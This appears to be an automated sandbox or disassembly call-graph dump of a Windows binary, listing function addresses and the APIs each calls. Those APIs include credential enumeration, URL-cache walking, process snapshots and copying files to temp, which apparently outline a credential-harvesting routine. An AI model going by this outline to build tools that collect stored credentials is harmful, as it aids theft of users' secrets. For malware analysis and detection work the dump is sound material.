EnumResourceNamesW EnumResourceNamesW wcscpy 38074->38075 38114 40da80 38075->38114 38078->38056 38080 40dbb4 memset memset 38079->38080 38081 409bca GetModuleFileNameW 38080->38081 38081->38063 38084 4447f4 38082->38084 38083 40dc1b 38083->38066 38083->38067 38084->38083 38085 444807 ??2@YAPAXI 38084->38085 38086 44481f 38085->38086 38087 444873 _snwprintf 38086->38087 38088 4448ab wcscpy 38086->38088 38121 44474a 8 API calls 38087->38121 38090 4448bb 38088->38090 38122 44474a 8 API calls 38090->38122 38091 4448a7 38091->38088 38091->38090 38093 4448cd 38123 44474a 8 API calls 38093->38123 38095 4448e2 38124 44474a 8 API calls 38095->38124 38097 4448f7 38125 44474a 8 API calls 38097->38125 38099 44490c 38126 44474a 8 API calls 38099->38126 38101 444921 38127 44474a 8 API calls 38101->38127 38103 444936 38128 44474a 8 API calls 38103->38128 38105 44494b 38129 44474a 8 API calls 38105->38129 38107 444960 ??3@YAXPAX 38107->38083 38109 44db70 38108->38109 38110 40d702 memset GetPrivateProfileStringW 38109->38110 38111 40d752 38110->38111 38112 40d75c WritePrivateProfileStringW 38110->38112 38111->38112 38113 40d758 38111->38113 38112->38113 38113->38070 38115 44db70 38114->38115 38116 40da8d memset 38115->38116 38117 40daac LoadStringW 38116->38117 38118 40dac6 38117->38118 38118->38117 38120 40dade 38118->38120 38130 40d76e memset GetPrivateProfileStringW WritePrivateProfileStringW memset _itow 38118->38130 38120->37892 38121->38091 38122->38093 38123->38095 38124->38097 38125->38099 38126->38101 38127->38103 38128->38105 38129->38107 38130->38118 38141 409b98 GetFileAttributesW 38131->38141 38133 40daea 38134 40db63 38133->38134 38135 40daef wcscpy wcscpy GetPrivateProfileIntW 38133->38135 38134->37894 38142 40d65d GetPrivateProfileStringW 38135->38142 38137 40db3e 38143 40d65d GetPrivateProfileStringW 38137->38143 38139 40db4f 38144 40d65d GetPrivateProfileStringW 38139->38144 38141->38133 38142->38137 38143->38139 38144->38134 38180 40eaff 38145->38180 38149 411ae2 memset 38148->38149 38150 411b8f 38148->38150 38220 409bca GetModuleFileNameW 38149->38220 38162 411a8b 38150->38162 38152 411b0a wcsrchr 38153 411b22 wcscat 38152->38153 38154 411b1f 38152->38154 38221 414770 wcscpy wcscpy wcscpy CreateFileW CloseHandle 38153->38221 38154->38153 38156 411b67 38222 402afb 38156->38222 38160 411b7f 38278 40ea13 SendMessageW memset SendMessageW 38160->38278 38163 402afb 27 API calls 38162->38163 38164 411ac0 38163->38164 38165 4110dc 38164->38165 38166 41113e 38165->38166 38171 4110f0 38165->38171 38303 40969c LoadCursorW SetCursor 38166->38303 38168 411143 38304 4032b4 38168->38304 38322 444a54 38168->38322 38169 4110f7 _wcsicmp 38169->38171 38170 411157 38172 40ada2 _wcsicmp 38170->38172 38171->38166 38171->38169 38325 410c46 10 API calls 38171->38325 38175 411167 38172->38175 38173 4111af 38175->38173 38176 4111a6 qsort 38175->38176 38176->38173 38179->37976 38181 40eb10 38180->38181 38193 40e8e0 38181->38193 38184 40eb6c memcpy memcpy 38185 40ebb7 38184->38185 38185->38184 38186 40ebf2 ??2@YAPAXI ??2@YAPAXI 38185->38186 38189 40d134 16 API calls 38185->38189 38187 40ec2e ??2@YAPAXI 38186->38187 38190 40ec65 38186->38190 38187->38190 38189->38185 38190->38190 38203 40ea7f 38190->38203 38192 402f49 38192->37976 38194 40e8f2 38193->38194 38195 40e8eb ??3@YAXPAX 38193->38195 38196 40e900 38194->38196 38197 40e8f9 ??3@YAXPAX 38194->38197 38195->38194 38198 40e911 38196->38198 38199 40e90a ??3@YAXPAX 38196->38199 38197->38196 38200 40e931 ??2@YAPAXI ??2@YAPAXI 38198->38200 38201 40e921 ??3@YAXPAX 38198->38201 38202 40e92a ??3@YAXPAX 38198->38202 38199->38198 38200->38184 38201->38202 38202->38200 38204 40aa04 ??3@YAXPAX 38203->38204 38205 40ea88 38204->38205 38206 40aa04 ??3@YAXPAX 38205->38206 38207 40ea90 38206->38207 38208 40aa04 ??3@YAXPAX 38207->38208 38209 40ea98 38208->38209 38210 40aa04 ??3@YAXPAX 38209->38210 38211 40eaa0 38210->38211 38212 40a9ce 4 API calls 38211->38212 38213 40eab3 38212->38213 38214 40a9ce 4 API calls 38213->38214 38215 40eabd 38214->38215 38216 40a9ce 4 API calls 38215->38216 38217 40eac7 38216->38217 38218 40a9ce 4 API calls 38217->38218 38219 40ead1 38218->38219 38219->38192 38220->38152 38221->38156 38279 40b2cc 38222->38279 38224 402b0a 38225 40b2cc 27 API calls 38224->38225 38226 402b23 38225->38226 38227 40b2cc 27 API calls 38226->38227 38228 402b3a 38227->38228 38229 40b2cc 27 API calls 38228->38229 38230 402b54 38229->38230 38231 40b2cc 27 API calls 38230->38231 38232 402b6b 38231->38232 38233 40b2cc 27 API calls 38232->38233 38234 402b82 38233->38234 38235 40b2cc 27 API calls 38234->38235 38236 402b99 38235->38236 38237 40b2cc 27 API calls 38236->38237 38238 402bb0 38237->38238 38239 40b2cc 27 API calls 38238->38239 38240 402bc7 38239->38240 38241 40b2cc 27 API calls 38240->38241 38242 402bde 38241->38242 38243 40b2cc 27 API calls 38242->38243 38244 402bf5 38243->38244 38245 40b2cc 27 API calls 38244->38245 38246 402c0c 38245->38246 38247 40b2cc 27 API calls 38246->38247 38248 402c23 38247->38248 38249 40b2cc 27 API calls 38248->38249 38250 402c3a 38249->38250 38251 40b2cc 27 API calls 38250->38251 38252 402c51 38251->38252 38253 40b2cc 27 API calls 38252->38253 38254 402c68 38253->38254 38255 40b2cc 27 API calls 38254->38255 38256 402c7f 38255->38256 38257 40b2cc 27 API calls 38256->38257 38258 402c99 38257->38258 38259 40b2cc 27 API calls 38258->38259 38260 402cb3 38259->38260 38261 40b2cc 27 API calls 38260->38261 38262 402cd5 38261->38262 38263 40b2cc 27 API calls 38262->38263 38264 402cf0 38263->38264 38265 40b2cc 27 API calls 38264->38265 38266 402d0b 38265->38266 38267 40b2cc 27 API calls 38266->38267 38268 402d26 38267->38268 38269 40b2cc 27 API calls 38268->38269 38270 402d3e 38269->38270 38271 40b2cc 27 API calls 38270->38271 38272 402d59 38271->38272 38273 40b2cc 27 API calls 38272->38273 38274 402d78 38273->38274 38275 40b2cc 27 API calls 38274->38275 38276 402d93 38275->38276 38277 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 38276->38277 38277->38160 38278->38150 38282 40b58d 38279->38282 38281 40b2d1 38281->38224 38283 40b5a4 GetModuleHandleW FindResourceW 38282->38283 38284 40b62e 38282->38284 38285 40b5c2 LoadResource 38283->38285 38287 40b5e7 38283->38287 38284->38281 38286 40b5d0 SizeofResource LockResource 38285->38286 38285->38287 38286->38287 38287->38284 38295 40afcf 38287->38295 38289 40b608 memcpy 38298 40b4d3 memcpy 38289->38298 38291 40b61e 38299 40b3c1 18 API calls 38291->38299 38293 40b626 38300 40b04b 38293->38300 38296 40b04b ??3@YAXPAX 38295->38296 38297 40afd7 ??2@YAPAXI 38296->38297 38297->38289 38298->38291 38299->38293 38301 40b051 ??3@YAXPAX 38300->38301 38302 40b05f 38300->38302 38301->38302 38302->38284 38303->38168 38305 4032c4 38304->38305 38306 40b633 ??3@YAXPAX 38305->38306 38307 403316 38306->38307 38326 44553b 38307->38326 38311 403480 38522 40368c 15 API calls 38311->38522 38313 403489 38314 40b633 ??3@YAXPAX 38313->38314 38315 403495 38314->38315 38315->38170 38316 4033a9 memset memcpy 38317 4033ec wcscmp 38316->38317 38318 40333c 38316->38318 38317->38318 38318->38311 38318->38316 38318->38317 38520 4028e7 11 API calls 38318->38520 38521 40f508 6 API calls 38318->38521 38320 403421 _wcsicmp 38320->38318 38323 444a64 FreeLibrary 38322->38323 38324 444a83 38322->38324 38323->38324 38324->38170 38325->38171 38327 445548 38326->38327 38328 445599 38327->38328 38523 40c768 38327->38523 38329 4455a8 memset 38328->38329 38336 4457f2 38328->38336 38606 403988 38329->38606 38340 445854 38336->38340 38708 403e2d memset memset memset memset memset 38336->38708 38337 445672 38617 403fbe memset memset memset memset memset 38337->38617 38338 4458bb memset memset 38344 414c2e 16 API calls 38338->38344 38389 4458aa 38340->38389 38731 403c9c memset memset memset memset memset 38340->38731 38342 44595e memset memset 38349 414c2e 16 API calls 38342->38349 38343 4455e5 38343->38337 38352 44560f 38343->38352 38345 4458f9 38344->38345 38350 40b2cc 27 API calls 38345->38350 38347 445a00 memset memset 38754 414c2e 38347->38754 38348 445b22 38354 445bca 38348->38354 38355 445b38 memset memset memset 38348->38355 38359 44599c 38349->38359 38360 445909 38350->38360 38351 44557a 38386 44558c 38351->38386 38803 41366b FreeLibrary 38351->38803 38363 4087b3 338 API calls 38352->38363 38353 445849 38818 40b1ab ??3@YAXPAX ??3@YAXPAX 38353->38818 38361 445c8b memset memset 38354->38361 38428 445cf0 38354->38428 38364 445bd4 38355->38364 38365 445b98 38355->38365 38368 40b2cc 27 API calls 38359->38368 38369 409d1f 6 API calls 38360->38369 38372 414c2e 16 API calls 38361->38372 38362 44589f 38819 40b1ab ??3@YAXPAX ??3@YAXPAX 38362->38819 38370 445621 38363->38370 38378 414c2e 16 API calls 38364->38378 38365->38364 38374 445ba2 38365->38374 38371 4459ac 38368->38371 38382 445919 38369->38382 38804 4454bf 20 API calls 38370->38804 38384 409d1f 6 API calls 38371->38384 38385 445cc9 38372->38385 38891 4099c6 wcslen 38374->38891 38375 4456b2 38806 40b1ab ??3@YAXPAX ??3@YAXPAX 38375->38806 38377 40b2cc 27 API calls 38390 445a4f 38377->38390 38392 445be2 38378->38392 38379 403335 38519 4452e5 45 API calls 38379->38519 38380 445d3d 38412 40b2cc 27 API calls 38380->38412 38381 445d88 memset memset memset 38395 414c2e 16 API calls 38381->38395 38820 409b98 GetFileAttributesW 38382->38820 38383 445823 38383->38353 38394 4087b3 338 API calls 38383->38394 38396 4459bc 38384->38396 38397 409d1f 6 API calls 38385->38397 38590 444b06 38386->38590 38387 445879 38387->38362 38408 4087b3 338 API calls 38387->38408 38389->38338 38413 44594a 38389->38413 38769 409d1f wcslen wcslen 38390->38769 38401 40b2cc 27 API calls 38392->38401 38394->38383 38405 445dde 38395->38405 38887 409b98 GetFileAttributesW 38396->38887 38407 445ce1 38397->38407 38398 445bb3 38894 445403 memset 38398->38894 38399 445680 38399->38375 38640 4087b3 memset 38399->38640 38402 445bf3 38401->38402 38411 409d1f 6 API calls 38402->38411 38403 445928 38403->38413 38821 40b6ef 38403->38821 38414 40b2cc 27 API calls 38405->38414 38911 409b98 GetFileAttributesW 38407->38911 38408->38387 38422 445c07 38411->38422 38423 445d54 _wcsicmp 38412->38423 38413->38342 38427 4459ed 38413->38427 38426 445def 38414->38426 38415 4459cb 38415->38427 38436 40b6ef 252 API calls 38415->38436 38419 40b2cc 27 API calls 38420 445a94 38419->38420 38774 40ae18 38420->38774 38421 44566d 38421->38336 38691 413d4c 38421->38691 38432 445389 258 API calls 38422->38432 38433 445d71 38423->38433 38498 445d67 38423->38498 38425 445665 38805 40b1ab ??3@YAXPAX ??3@YAXPAX 38425->38805 38434 409d1f 6 API calls 38426->38434 38427->38347 38427->38348 38428->38379 38428->38380 38428->38381 38429 445389 258 API calls 38429->38354 38438 445c17 38432->38438 38912 445093 23 API calls 38433->38912 38441 445e03 38434->38441 38436->38427 38437 4456d8 38443 40b2cc 27 API calls 38437->38443 38444 40b2cc 27 API calls 38438->38444 38440 44563c 38440->38425 38446 4087b3 338 API calls 38440->38446 38913 409b98 GetFileAttributesW 38441->38913 38442 40b6ef 252 API calls 38442->38379 38448 4456e2 38443->38448 38449 445c23 38444->38449 38445 445d83 38445->38379 38446->38440 38807 413fa6 _wcsicmp _wcsicmp 38448->38807 38453 409d1f 6 API calls 38449->38453 38451 445e12 38458 445e6b 38451->38458 38464 40b2cc 27 API calls 38451->38464 38456 445c37 38453->38456 38454 445aa1 38457 445b17 38454->38457 38472 445ab2 memset 38454->38472 38485 409d1f 6 API calls 38454->38485 38781 40add4 38454->38781 38786 445389 38454->38786 38795 40ae51 38454->38795 38455 4456eb 38460 4456fd memset memset memset memset 38455->38460 38461 4457ea 38455->38461 38462 445389 258 API calls 38456->38462 38888 40aebe 38457->38888 38915 445093 23 API calls 38458->38915 38808 409c70 wcscpy wcsrchr 38460->38808 38811 413d29 38461->38811 38467 445c47 38462->38467 38468 445e33 38464->38468 38474 40b2cc 27 API calls 38467->38474 38475 409d1f 6 API calls 38468->38475 38470 445e7e 38471 445f67 38470->38471 38480 40b2cc 27 API calls 38471->38480 38476 40b2cc 27 API calls 38472->38476 38478 445c53 38474->38478 38479 445e47 38475->38479 38476->38454 38477 409c70 2 API calls 38481 44577e 38477->38481 38482 409d1f 6 API calls 38478->38482 38914 409b98 GetFileAttributesW 38479->38914 38484 445f73 38480->38484 38486 409c70 2 API calls 38481->38486 38487 445c67 38482->38487 38489 409d1f 6 API calls 38484->38489 38485->38454 38490 44578d 38486->38490 38491 445389 258 API calls 38487->38491 38488 445e56 38488->38458 38494 445e83 memset 38488->38494 38492 445f87 38489->38492 38490->38461 38497 40b2cc 27 API calls 38490->38497 38491->38354 38918 409b98 GetFileAttributesW 38492->38918 38496 40b2cc 27 API calls 38494->38496 38499 445eab 38496->38499 38500 4457a8 38497->38500 38498->38379 38498->38442 38501 409d1f 6 API calls 38499->38501 38502 409d1f 6 API calls 38500->38502 38503 445ebf 38501->38503 38504 4457b8 38502->38504 38505 40ae18 9 API calls 38503->38505 38810 409b98 GetFileAttributesW 38504->38810 38515 445ef5 38505->38515 38507 4457c7 38507->38461 38509 4087b3 338 API calls 38507->38509 38508 40ae51 9 API calls 38508->38515 38509->38461 38510 445f5c 38512 40aebe FindClose 38510->38512 38511 40add4 2 API calls 38511->38515 38512->38471 38513 40b2cc 27 API calls 38513->38515 38514 409d1f 6 API calls 38514->38515 38515->38508 38515->38510 38515->38511 38515->38513 38515->38514 38517 445f3a 38515->38517 38916 409b98 GetFileAttributesW 38515->38916 38917 445093 23 API calls 38517->38917 38519->38318 38520->38320 38521->38318 38522->38313 38524 40c775 38523->38524 38919 40b1ab ??3@YAXPAX ??3@YAXPAX 38524->38919 38526 40c788 38920 40b1ab ??3@YAXPAX ??3@YAXPAX 38526->38920 38528 40c790 38921 40b1ab ??3@YAXPAX ??3@YAXPAX 38528->38921 38530 40c798 38531 40aa04 ??3@YAXPAX 38530->38531 38532 40c7a0 38531->38532 38922 40c274 memset 38532->38922 38537 40a8ab 9 API calls 38538 40c7c3 38537->38538 38539 40a8ab 9 API calls 38538->38539 38540 40c7d0 38539->38540 38951 40c3c3 38540->38951 38544 40c877 38553 40bdb0 38544->38553 38545 40c86c 38993 4053fe 39 API calls 38545->38993 38547 40c7e5 38547->38544 38547->38545 38552 40c634 49 API calls 38547->38552 38976 40a706 38547->38976 38552->38547 39161 404363 38553->39161 38556 40bf5d 39181 40440c 38556->39181 38558 40bdee 38558->38556 38561 40b2cc 27 API calls 38558->38561 38559 40bddf CredEnumerateW 38559->38558 38562 40be02 wcslen 38561->38562 38562->38556 38565 40be1e 38562->38565 38563 40be26 _wcsncoll 38563->38565 38565->38556 38565->38563 38567 40be7d memset 38565->38567 38568 40bea7 memcpy 38565->38568 38569 40bf11 wcschr 38565->38569 38570 40b2cc 27 API calls 38565->38570 38572 40bf43 LocalFree 38565->38572 39184 40bd5d 28 API calls 38565->39184 39185 404423 38565->39185 38567->38565 38567->38568 38568->38565 38568->38569 38569->38565 38571 40bef6 _wcsnicmp 38570->38571 38571->38565 38571->38569 38572->38565 38573 4135f7 39198 4135e0 38573->39198 38576 40b2cc 27 API calls 38577 41360d 38576->38577 38578 40a804 8 API calls 38577->38578 38579 413613 38578->38579 38580 41361b 38579->38580 38581 41363e 38579->38581 38582 40b273 27 API calls 38580->38582 38583 4135e0 FreeLibrary 38581->38583 38584 413625 GetProcAddress 38582->38584 38585 413643 38583->38585 38584->38581 38586 413648 38584->38586 38585->38351 38587 413658 38586->38587 38588 4135e0 FreeLibrary 38586->38588 38587->38351 38589 413666 38588->38589 38589->38351 39201 4449b9 38590->39201 38593 444c1f 38593->38328 38594 4449b9 42 API calls 38596 444b4b 38594->38596 38595 444c15 38598 4449b9 42 API calls 38595->38598 38596->38595 39222 444972 GetVersionExW 38596->39222 38598->38593 38599 444b99 memcmp 38604 444b8c 38599->38604 38600 444c0b 39226 444a85 42 API calls 38600->39226 38604->38599 38604->38600 39223 444aa5 42 API calls 38604->39223 39224 40a7a0 GetVersionExW 38604->39224 39225 444a85 42 API calls 38604->39225 38607 40399d 38606->38607 39227 403a16 38607->39227 38609 403a09 39241 40b1ab ??3@YAXPAX ??3@YAXPAX 38609->39241 38611 403a12 wcsrchr 38611->38343 38612 4039a3 38612->38609 38615 4039f4 38612->38615 39238 40a02c CreateFileW 38612->39238 38615->38609 38616 4099c6 2 API calls 38615->38616 38616->38609 38618 414c2e 16 API calls 38617->38618 38619 404048 38618->38619 38620 414c2e 16 API calls 38619->38620 38621 404056 38620->38621 38622 409d1f 6 API calls 38621->38622 38623 404073 38622->38623 38624 409d1f 6 API calls 38623->38624 38625 40408e 38624->38625 38626 409d1f 6 API calls 38625->38626 38627 4040a6 38626->38627 38628 403af5 20 API calls 38627->38628 38629 4040ba 38628->38629 38630 403af5 20 API calls 38629->38630 38631 4040cb 38630->38631 39268 40414f memset 38631->39268 38633 404140 39282 40b1ab ??3@YAXPAX ??3@YAXPAX 38633->39282 38635 4040ec memset 38638 4040e0 38635->38638 38636 404148 38636->38399 38637 4099c6 2 API calls 38637->38638 38638->38633 38638->38635 38638->38637 38639 40a8ab 9 API calls 38638->38639 38639->38638 39295 40a6e6 WideCharToMultiByte 38640->39295 38642 4087ed 39296 4095d9 memset 38642->39296 38645 408953 38645->38399 38646 408809 memset memset memset memset memset 38647 40b2cc 27 API calls 38646->38647 38648 4088a1 38647->38648 38649 409d1f 6 API calls 38648->38649 38650 4088b1 38649->38650 38651 40b2cc 27 API calls 38650->38651 38652 4088c0 38651->38652 38653 409d1f 6 API calls 38652->38653 38654 4088d0 38653->38654 38655 40b2cc 27 API calls 38654->38655 38656 4088df 38655->38656 38657 409d1f 6 API calls 38656->38657 38658 4088ef 38657->38658 38659 40b2cc 27 API calls 38658->38659 38660 4088fe 38659->38660 38661 409d1f 6 API calls 38660->38661 38662 40890e 38661->38662 38663 40b2cc 27 API calls 38662->38663 38664 40891d 38663->38664 38692 40b633 ??3@YAXPAX 38691->38692 38693 413d65 CreateToolhelp32Snapshot memset Process32FirstW 38692->38693 38694 413f00 Process32NextW 38693->38694 38695 413da5 OpenProcess 38694->38695 38696 413f17 CloseHandle 38694->38696 38697 413df3 memset 38695->38697 38700 413eb0 38695->38700 38696->38437 39595 413f27 38697->39595 38699 413ebf ??3@YAXPAX 38699->38700 38700->38694 38700->38699 38701 4099f4 3 API calls 38700->38701 38701->38700 38703 413e37 GetModuleHandleW 38704 413e1f 38703->38704 38705 413e46 GetProcAddress 38703->38705 38704->38703 39600 413959 38704->39600 39616 413ca4 38704->39616 38705->38704 38707 413ea2 CloseHandle 38707->38700 38709 414c2e 16 API calls 38708->38709 38710 403eb7 38709->38710 38711 414c2e 16 API calls 38710->38711 38712 403ec5 38711->38712 38713 409d1f 6 API calls 38712->38713 38714 403ee2 38713->38714 38715 409d1f 6 API calls 38714->38715 38716 403efd 38715->38716 38717 409d1f 6 API calls 38716->38717 38718 403f15 38717->38718 38719 403af5 20 API calls 38718->38719 38720 403f29 38719->38720 38721 403af5 20 API calls 38720->38721 38722 403f3a 38721->38722 38723 40414f 33 API calls 38722->38723 38724 403f4f 38723->38724 38725 403faf 38724->38725 38727 403f5b memset 38724->38727 38729 4099c6 2 API calls 38724->38729 38730 40a8ab 9 API calls 38724->38730 39630 40b1ab ??3@YAXPAX ??3@YAXPAX 38725->39630 38727->38724 38728 403fb7 38728->38383 38729->38724 38730->38724 38732 414c2e 16 API calls 38731->38732 38733 403d26 38732->38733 38734 414c2e 16 API calls 38733->38734 38735 403d34 38734->38735 38736 409d1f 6 API calls 38735->38736 38737 403d51 38736->38737 38738 409d1f 6 API calls 38737->38738 38739 403d6c 38738->38739 38740 409d1f 6 API calls 38739->38740 38741 403d84 38740->38741 38742 403af5 20 API calls 38741->38742 38743 403d98 38742->38743 38744 403af5 20 API calls 38743->38744 38745 403da9 38744->38745 38746 40414f 33 API calls 38745->38746 38747 403dbe 38746->38747 38748 403e1e 38747->38748 38749 403dca memset 38747->38749 38752 4099c6 2 API calls 38747->38752 38753 40a8ab 9 API calls 38747->38753 39631 40b1ab ??3@YAXPAX ??3@YAXPAX 38748->39631 38749->38747 38751 403e26 38751->38387 38752->38747 38753->38747 38755 414b81 9 API calls 38754->38755 38756 414c40 38755->38756 38757 414c73 memset 38756->38757 39632 409cea 38756->39632 38758 414c94 38757->38758 39635 414592 RegOpenKeyExW 38758->39635 38761 414c64 38761->38377 38763 414cc1 38764 414cf4 wcscpy 38763->38764 39636 414bb0 wcscpy 38763->39636 38764->38761 38766 414cd2 39637 4145ac RegQueryValueExW 38766->39637 38768 414ce9 RegCloseKey 38768->38764 38770 409d62 38769->38770 38771 409d43 wcscpy 38769->38771 38770->38419 38772 409719 2 API calls 38771->38772 38773 409d51 wcscat 38772->38773 38773->38770 38775 40aebe FindClose 38774->38775 38776 40ae21 38775->38776 38777 4099c6 2 API calls 38776->38777 38778 40ae35 38777->38778 38779 409d1f 6 API calls 38778->38779 38780 40ae49 38779->38780 38780->38454 38782 40ade0 38781->38782 38783 40ae0f 38781->38783 38782->38783 38784 40ade7 wcscmp 38782->38784 38783->38454 38784->38783 38785 40adfe wcscmp 38784->38785 38785->38783 38787 40ae18 9 API calls 38786->38787 38793 4453c4 38787->38793 38788 40ae51 9 API calls 38788->38793 38789 4453f3 38791 40aebe FindClose 38789->38791 38790 40add4 2 API calls 38790->38793 38792 4453fe 38791->38792 38792->38454 38793->38788 38793->38789 38793->38790 38794 445403 253 API calls 38793->38794 38794->38793 38796 40ae7b FindNextFileW 38795->38796 38797 40ae5c FindFirstFileW 38795->38797 38798 40ae94 38796->38798 38799 40ae8f 38796->38799 38797->38798 38801 40aeb6 38798->38801 38802 409d1f 6 API calls 38798->38802 38800 40aebe FindClose 38799->38800 38800->38798 38801->38454 38802->38801 38803->38386 38804->38440 38805->38421 38806->38421 38807->38455 38809 409c89 38808->38809 38809->38477 38810->38507 38812 413d39 38811->38812 38813 413d2f FreeLibrary 38811->38813 38814 40b633 ??3@YAXPAX 38812->38814 38813->38812 38815 413d42 38814->38815 38816 40b633 ??3@YAXPAX 38815->38816 38817 413d4a 38816->38817 38817->38336 38818->38340 38819->38389 38820->38403 38822 44db70 38821->38822 38823 40b6fc memset 38822->38823 38824 409c70 2 API calls 38823->38824 38825 40b732 wcsrchr 38824->38825 38826 40b743 38825->38826 38827 40b746 memset 38825->38827 38826->38827 38828 40b2cc 27 API calls 38827->38828 38829 40b76f 38828->38829 38830 409d1f 6 API calls 38829->38830 38831 40b783 38830->38831 39638 409b98 GetFileAttributesW 38831->39638 38833 40b792 38834 40b7c2 38833->38834 38835 409c70 2 API calls 38833->38835 39639 40bb98 38834->39639 38837 40b7a5 38835->38837 38839 40b2cc 27 API calls 38837->38839 38843 40b7b2 38839->38843 38840 40b837 FindCloseChangeNotification 38842 40b83e memset 38840->38842 38841 40b817 39673 409a45 GetTempPathW 38841->39673 39672 40a6e6 WideCharToMultiByte 38842->39672 38846 409d1f 6 API calls 38843->38846 38846->38834 38847 40b827 CopyFileW 38847->38842 38848 40b866 38849 444432 121 API calls 38848->38849 38850 40b879 38849->38850 38851 40bad5 38850->38851 38852 40b273 27 API calls 38850->38852 38853 40baeb 38851->38853 38854 40bade DeleteFileW 38851->38854 38855 40b89a 38852->38855 38856 40b04b ??3@YAXPAX 38853->38856 38854->38853 38857 438552 134 API calls 38855->38857 38858 40baf3 38856->38858 38859 40b8a4 38857->38859 38858->38413 38860 40bacd 38859->38860 38862 4251c4 137 API calls 38859->38862 38861 443d90 111 API calls 38860->38861 38861->38851 38885 40b8b8 38862->38885 38863 40bac6 39685 424f26 123 API calls 38863->39685 38864 40b8bd memset 39676 425413 17 API calls 38864->39676 38867 425413 17 API calls 38867->38885 38870 40a71b MultiByteToWideChar 38870->38885 38871 40a734 MultiByteToWideChar 38871->38885 38874 40b9b5 memcmp 38874->38885 38875 4099c6 2 API calls 38875->38885 38876 404423 37 API calls 38876->38885 38878 40bb3e memset memcpy 39686 40a734 MultiByteToWideChar 38878->39686 38879 4251c4 137 API calls 38879->38885 38882 40bb88 LocalFree 38882->38885 38885->38863 38885->38864 38885->38867 38885->38870 38885->38871 38885->38874 38885->38875 38885->38876 38885->38878 38885->38879 38886 40ba5f memcmp 38885->38886 39677 4253ef 16 API calls 38885->39677 39678 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 38885->39678 39679 4253af 17 API calls 38885->39679 39680 4253cf 17 API calls 38885->39680 39681 447280 memset 38885->39681 39682 447960 memset memcpy memcpy memcpy 38885->39682 39683 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 38885->39683 39684 447920 memcpy memcpy memcpy 38885->39684 38886->38885 38887->38415 38889 40aed1 38888->38889 38890 40aec7 FindClose 38888->38890 38889->38348 38890->38889 38892 4099d7 38891->38892 38893 4099da memcpy 38891->38893 38892->38893 38893->38398 38895 40b2cc 27 API calls 38894->38895 38896 44543f 38895->38896 38897 409d1f 6 API calls 38896->38897 38898 44544f 38897->38898 39782 409b98 GetFileAttributesW 38898->39782 38900 44545e 38901 445476 38900->38901 38902 40b6ef 252 API calls 38900->38902 38903 40b2cc 27 API calls 38901->38903 38902->38901 38904 445482 38903->38904 38905 409d1f 6 API calls 38904->38905 38906 445492 38905->38906 39783 409b98 GetFileAttributesW 38906->39783 38908 4454a1 38909 4454b9 38908->38909 38910 40b6ef 252 API calls 38908->38910 38909->38429 38910->38909 38911->38428 38912->38445 38913->38451 38914->38488 38915->38470 38916->38515 38917->38515 38918->38498 38919->38526 38920->38528 38921->38530 38923 414c2e 16 API calls 38922->38923 38924 40c2ae 38923->38924 38994 40c1d3 38924->38994 38929 40c3be 38946 40a8ab 38929->38946 38930 40afcf 2 API calls 38931 40c2fd FindFirstUrlCacheEntryW 38930->38931 38932 40c3b6 38931->38932 38933 40c31e wcschr 38931->38933 38934 40b04b ??3@YAXPAX 38932->38934 38935 40c331 38933->38935 38936 40c35e FindNextUrlCacheEntryW 38933->38936 38934->38929 38937 40a8ab 9 API calls 38935->38937 38936->38933 38938 40c373 GetLastError 38936->38938 38941 40c33e wcschr 38937->38941 38939 40c3ad FindCloseUrlCache 38938->38939 38940 40c37e 38938->38940 38939->38932 38942 40afcf 2 API calls 38940->38942 38941->38936 38943 40c34f 38941->38943 38944 40c391 FindNextUrlCacheEntryW 38942->38944 38945 40a8ab 9 API calls 38943->38945 38944->38933 38944->38939 38945->38936 39088 40a97a 38946->39088 38949 40a8cc 38949->38537 38950 40a8d0 7 API calls 38950->38949 39093 40b1ab ??3@YAXPAX ??3@YAXPAX 38951->39093 38953 40c3dd 38954 40b2cc 27 API calls 38953->38954 38955 40c3e7 38954->38955 39094 414592 RegOpenKeyExW 38955->39094 38957 40c3f4 38958 40c50e 38957->38958 38959 40c3ff 38957->38959 38973 405337 38958->38973 38960 40a9ce 4 API calls 38959->38960 38961 40c418 memset 38960->38961 39095 40aa1d 38961->39095 38964 40c471 38966 40c47a _wcsupr 38964->38966 38965 40c505 RegCloseKey 38965->38958 38967 40a8d0 7 API calls 38966->38967 38968 40c498 38967->38968 38969 40a8d0 7 API calls 38968->38969 38970 40c4ac memset 38969->38970 38971 40aa1d 38970->38971 38972 40c4e4 RegEnumValueW 38971->38972 38972->38965 38972->38966 39097 405220 38973->39097 38977 4099c6 2 API calls 38976->38977 38978 40a714 _wcslwr 38977->38978 38979 40c634 38978->38979 39154 405361 38979->39154 38982 40c65c wcslen 39157 4053b6 39 API calls 38982->39157 38983 40c71d wcslen 38983->38547 38985 40c713 39160 4053df 39 API calls 38985->39160 38986 40c677 38986->38985 39158 40538b 39 API calls 38986->39158 38989 40c6a5 38989->38985 38990 40c6a9 memset 38989->38990 38991 40c6d3 38990->38991 39159 40c589 43 API calls 38991->39159 38993->38544 38995 40ae18 9 API calls 38994->38995 39001 40c210 38995->39001 38996 40ae51 9 API calls 38996->39001 38997 40c264 38998 40aebe FindClose 38997->38998 39000 40c26f 38998->39000 38999 40add4 2 API calls 38999->39001 39006 40e5ed memset memset 39000->39006 39001->38996 39001->38997 39001->38999 39002 40c231 _wcsicmp 39001->39002 39003 40c1d3 35 API calls 39001->39003 39002->39001 39004 40c248 39002->39004 39003->39001 39019 40c084 22 API calls 39004->39019 39007 414c2e 16 API calls 39006->39007 39008 40e63f 39007->39008 39009 409d1f 6 API calls 39008->39009 39010 40e658 39009->39010 39020 409b98 GetFileAttributesW 39010->39020 39012 40e667 39013 40e680 39012->39013 39015 409d1f 6 API calls 39012->39015 39021 409b98 GetFileAttributesW 39013->39021 39015->39013 39016 40e68f 39017 40c2d8 39016->39017 39022 40e4b2 39016->39022 39017->38929 39017->38930 39019->39001 39020->39012 39021->39016 39043 40e01e 39022->39043 39024 40e593 39026 40e5b0 39024->39026 39027 40e59c DeleteFileW 39024->39027 39025 40e521 39025->39024 39066 40e175 39025->39066 39028 40b04b ??3@YAXPAX 39026->39028 39027->39026 39029 40e5bb 39028->39029 39031 40e5c4 CloseHandle 39029->39031 39032 40e5cc 39029->39032 39031->39032 39034 40b633 ??3@YAXPAX 39032->39034 39033 40e573 39035 40e584 39033->39035 39036 40e57c FindCloseChangeNotification 39033->39036 39037 40e5db 39034->39037 39087 40b1ab ??3@YAXPAX ??3@YAXPAX 39035->39087 